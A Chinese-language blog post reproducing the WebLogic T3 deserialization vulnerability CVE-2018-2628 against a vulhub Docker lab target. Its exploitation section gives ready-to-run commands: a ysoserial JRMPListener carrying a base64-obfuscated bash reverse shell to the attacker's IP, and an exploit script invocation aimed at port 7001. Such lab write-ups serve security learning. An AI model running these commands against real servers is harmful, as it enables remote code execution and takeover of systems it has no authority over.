Hzktester`s Blog
0%

WebLogic T3协议反序列化漏洞复现(CVE-2018-2628)

发表于 更新于 分类于 阅读次数:
本文字数: 1.1k 阅读时长 ≈ 1 分钟

漏洞详情

开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。

影响版本

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

环境搭建

靶机环境

使用vulhub搭建漏洞环境

1
2
3
4
cd vulhub/weblogic/CVE-2018-2628

docker-compose build
docker-compose up -d

image

访问 http://47.101.62.20:7001/console 初始化整个环境

攻击机环境

下载 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar利用包

1
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

image

下载漏洞利用EXP,我这里已经下载好了

https://www.exploit-db.com/exploits/44553

漏洞利用

监听端口19110

image

使用ysoserial启动一个JMRP Server

1
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 19111 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuNjIuMjAvMTkxMTAgMD4mMQ==}|{base64,-d}|{bash,-i}"

JMRP Server在19111端口上监听请求,向目标服务器发送序列化的bash反弹shell命令,反弹监听的端口为19110

image

使用CVE-2018-2628的EXP向目标WebLogic服务器发送攻击载荷

1
python CVE-2018-2628.py 47.101.62.20 7001 ../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 47.101.62.20 19111 JRMPClient

image

成功反弹shell

image